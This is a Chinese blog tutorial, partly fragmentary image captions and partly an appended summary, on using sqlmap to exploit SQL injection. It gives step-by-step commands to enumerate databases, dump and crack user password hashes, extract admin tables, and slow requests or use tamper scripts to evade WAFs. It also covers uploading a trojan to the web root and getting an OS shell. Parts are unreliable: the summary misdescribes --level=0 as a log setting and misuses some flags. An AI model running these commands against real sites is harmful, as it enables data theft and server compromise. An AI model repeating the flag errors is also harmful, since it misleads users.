SQLMAP

SQLMAP介绍
在这里插入图片描述当然也可以过一些waf
sqlmap安装
在这里插入图片描述
基本的参数
在这里插入图片描述–is-dba
基本的还是
sqlmap.py -u"测试的网址"
current就是当前的
在这里插入图片描述时间延迟类型
在这里插入图片描述测得是union联合查询类型的
在这里插入图片描述这个是sqlmap跑出来的一个
第一行说的是在id参数下存在的注入
第一个 type是bool盲注
第二个 时间延迟盲注
第三个 union联合查询
在这里插入图片描述这些信息是 mysql的数据库
操作系统是 win2003或者是xp
以及php脚本版本 和mysql的版本
sqlmap.py -u"测试的网址" --is-dba(看数据库连接的到底是什么权限)
(如果access的数据库就没有必要执行这个命令 因为他是一个文件存在的)

在这里插入图片描述这个true代表的是当前的这个网站dba是管理员 这个权限是很大的
sqlmap.py -u"测试的网址" --dbs
看看当前数据库有哪些用户数据库
在这里插入图片描述这些都是数据库
sqlmap.py -u"测试的网址" --current-db
(看下当前我是哪些数据库)
在这里插入图片描述这是我们数据库的名称
sqlmap.py -u"测试的网址" --current-user
(连接的数据库用户名称)
在这里插入图片描述sqlmap.py -u"测试的网址" --users
(查看下除看这个用户,此数据库还有哪些用户)
在这里插入图片描述这些都是 其他的用户
然后
sqlmap.py -u"测试的网址" --passwords
(列一些这些用户的密码)
在这里插入图片描述这就是用户和他的密码
这个复制出来去md5破解一下就可以了
不能解出来的话 就要加载字典去破解
sqlmap.py -u"测试的网址" --table -D 数据库名
(数据库列表名,指定数据库名列表)
在这里插入图片描述
告诉你有13条表
在这里插入图片描述
sqlmap.py -u"测试的网址" --table -D 数据库名 --count
在这里插入图片描述
(统计下每个表里边有多少行,进行大体的统计下)
在这里插入图片描述
一般管理员的表里就1,2条的数据,可以根据这个特征来看
看些表少得,可能就是管理员的表
sqlmap.py -u"测试的网址" --colunmns -T 指定的表名 -D 数据库名
在这里插入图片描述
(指定数据库名称指定表名列列名)
在这里插入图片描述
这是跑出来的列名
sqlmap.py -u"测试的网址" --dump -C 指定列名 -T 指定的表名 -D 数据库名
在这里插入图片描述
(指定数据库名表名列名列里边的数据)
在这里插入图片描述会出现让你加载一个字典
通过你的加密方式把本地的明文加密成密文
在这里插入图片描述这样就把密文跑出来了 密码明文就是admin123

基本参数
在这里插入图片描述在这里插入图片描述
sqlmap.py -u"测试的网址" --privileges
(看当前的用户权限)
在这里插入图片描述数据库的所有权限基本都是有的
–schema是列整个系统架构的 --batch就是不提示我了 就相当于系统自动默认的yes等等
–exclude-sysdbs 把系统的数据库不列 就是系统自带的数据库

探测登级
在这里插入图片描述内容就是这样定义的
cookie就是级别是2
测http头要改成3才能测
显示调试信息
在这里插入图片描述sqlmap.py -u"测试的网址" --dbs -v 3
sqlmap.py -u"测试的网址" --tables -D xss -v 3

在这里插入图片描述
sqlmap.py -u"测试的网址" --columns -D xss -v 4
(如果想要看响应页面呢)
在这里插入图片描述一些请求包
风险登级
在这里插入图片描述
sqlmap.py -u"测试的网址" --level 3 --risk 3
(让测试的语句更全面一些)
获取目标
在这里插入图片描述 sqlmap.py -m 报的路径以及包名
(-m就是多个)
这是测试多个
在这里插入图片描述-r就是跑包
处理Google搜索结果
在这里插入图片描述用之前要挂代理
能访问谷歌在这里插入图片描述data
在这里插入图片描述在这里插入图片描述就是把后面的参数提交给前面的网址页面

–param-del
在这里插入图片描述cookie
在这里插入图片描述–referer(判断请求来源),–headers --proxy(代理)
在这里插入图片描述在这里插入图片描述时间控制
在这里插入图片描述原理就是你用工具1s访问了10次 这不可能是人在浏览 它会自动判断这是个cc攻击
所以就会waf拦截 我们要把这个每秒的访问次数调低些,这个waf就不会拦截你了
在这里插入图片描述就可以这样改下
–safe-url,–safe-freq
在这里插入图片描述不常用
-p
在这里插入图片描述–prefix --suffix
在这里插入图片描述帮助闭合

–technique
在这里插入图片描述怎么用呢
在这里插入图片描述u 指联合查询 e指显错注入 flush-session 清除缓存
(指那些方式去测试网站)
–union-cols
在这里插入图片描述sqlmap 与oracle 都是用null 来填充的
–second-order
在这里插入图片描述如果遇到了二阶注入的类型
指定它回显示从哪里开始的
–dump-all,–exclude -sysdbs
在这里插入图片描述–search -C -T -D
在这里插入图片描述主动的直接去搜索表名
在这里插入图片描述结果有两种 一个是模糊匹配 一个是完整匹配
在这里插入图片描述
1就是模糊匹配 2就是完整匹配
-udf-inject shared-lib
在这里插入图片描述-s -t
在这里插入图片描述-batch
在这里插入图片描述–flush-session
(清楚缓存)
在这里插入图片描述–output-dir
(保存路径的).
在这里插入图片描述–smart --mobile
在这里插入图片描述–identify-waf ,–check-waf
在这里插入图片描述注册表操作
在这里插入图片描述不建议改,可能会改崩
暴力破解表名

在这里插入图片描述
在这里插入图片描述暴力破解列名
在这里插入图片描述post登录框注入
在这里插入图片描述所搜框注入
在这里插入图片描述
伪静态
在这里插入图片描述延迟注入
在这里插入图片描述
base6编码
在这里插入图片描述
执行sql语句
在这里插入图片描述看下版本
在这里插入图片描述
在这里插入图片描述
读文件
into outfile 写文件
文件读写
在这里插入图片描述在这里插入图片描述用法
文件上传
在这里插入图片描述就是个上传的方式
在这里插入图片描述把自己的木马文件上传到网站的根目录下
命令执行
在这里插入图片描述记住–os-shell重要
在这里插入图片描述4个路径
依次是默认结构路径
自定义路径
加载目录列表进行爆破
暴力搜索.
在这里插入图片描述选择的第二个路径 上传文件
导出数据
在这里插入图片描述
WAF绕过
在这里插入图片描述配合msf使用
在这里插入图片描述

### SQLmap 使用教程和案例 #### 什么是SQLmap SQLmap 是一款开源的渗透测试工具,主要用于自动化检测和利用SQL注入漏洞。该工具支持多种类型的数据库,并能自动识别并利用各种形式的SQL注入漏洞。 #### 基础命令与参数设置 为了启动SQLmap并对特定URL进行基本扫描,可以使用如下命令: ```bash sqlmap -u "http://example.com/vuln.php?id=1" ``` 此命令会尝试通过GET请求来探测`http://example.com/vuln.php?id=1`是否存在SQL注入漏洞[^1]。 对于更复杂的场景,比如需要发送POST请求或者带有Cookie的情况,则可以通过增加相应选项来进行配置: ```bash sqlmap -r request.txt --data="username=admin&password=password" --cookie="PHPSESSID=value;" ``` 这里`request.txt`包含了HTTP请求的具体细节,而`--data`指定了POST提交的数据,`--cookie`则用于传递必要的Cookies[^4]。 #### 获取当前使用的数据库名称 如果已经确认存在SQL注入点,想要知道应用程序正在使用哪个具体的数据库,可执行以下指令: ```bash sqlmap -u "http://example.com/vuln.php?id=1" --current-db ``` 这条命令将会返回服务器上运行的应用程序所连接的那个具体数据库的名字。 #### 数据库信息提取流程 一旦成功验证了某个站确实有SQL注入缺陷之后,就可以进一步挖掘更多有用的信息,例如获取所有的数据库列表、表结构以及其中存储的内容等。以下是几个常用的子命令及其功能简介: - **列出所有可用的数据库** ```bash sqlmap -u "http://example.com/vuln.php?id=1" -D database_name --dbs ``` - **枚举选定数据库中的表格** ```bash sqlmap -u "http://example.com/vuln.php?id=1" -D database_name -T table_name --tables ``` - **读取指定表内的列名** ```bash sqlmap -u "http://example.com/vuln.php?id=1" -D database_name -T table_name -C column_name --columns ``` - **导出实际数据记录** ```bash sqlmap -u "http://example.com/vuln.php?id=1" -D database_name -T table_name -C column_name --dump ``` 上述每一步都可以帮助逐步深入理解目标系统的内部架构,从而更好地评估潜在的全威胁[^3]。 #### 绕过Web应用防火墙(WAF) 当遇到部署了WAF防护机制的目标站点时,可能需要借助于Tamper脚本来修改攻击载荷的形式,使其能够避开防御措施而不触发警报。例如,在某些情况下,简单的字符串替换就能有效规避过滤规则: ```bash sqlmap -u "http://example.com/vuln.php?id=1" --tamper=between.py,randomcase.py,multiplespaces.py ``` 这段代码表示同时运用三个不同的转换函数处理输入payload,增加了绕过的成功率[^2]。 #### 日志级别控制 调整日志输出可以帮助减少不必要的干扰信息量,专注于最重要的部分。默认的日志等级设为1(INFO),但如果只想看到错误级别的消息,可以这样设定: ```bash sqlmap -u "http://example.com/vuln.php?id=1" --batch --output-dir=./results --level=0 ``` 这里的`--level=0`意味着仅显示Python traceback信息、错误信息[ERROR] 和 关键信息[CRITICAL][^5]。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值